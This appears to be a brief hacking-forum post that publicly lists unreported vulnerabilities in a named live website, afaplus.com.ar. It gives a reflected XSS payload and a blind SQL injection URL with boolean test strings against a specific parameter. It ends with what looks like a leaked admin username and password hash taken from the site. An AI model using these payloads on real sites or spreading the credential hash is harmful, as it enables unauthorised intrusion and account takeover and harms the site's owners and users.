(http://img854.imageshack.us/img854/5349/afaplus.png)
Bug: XSS
Url: http://www.afaplus.com.ar
Vector: <script>alert('ANTRAX')</script>
Reportado: NO
Blind SQLi
(http://img845.imageshack.us/img845/6/afaplussqli.png)
URL Vulnerable: http://www.afaplus.com.ar/avances?idequipo=1
http://www.afaplus.com.ar/avances?idequipo=1%20AND%201=1
http://www.afaplus.com.ar/avances?idequipo=1%20AND%201=0
Admin_Afa:3c4568628ca02c7f8a570f32281a440a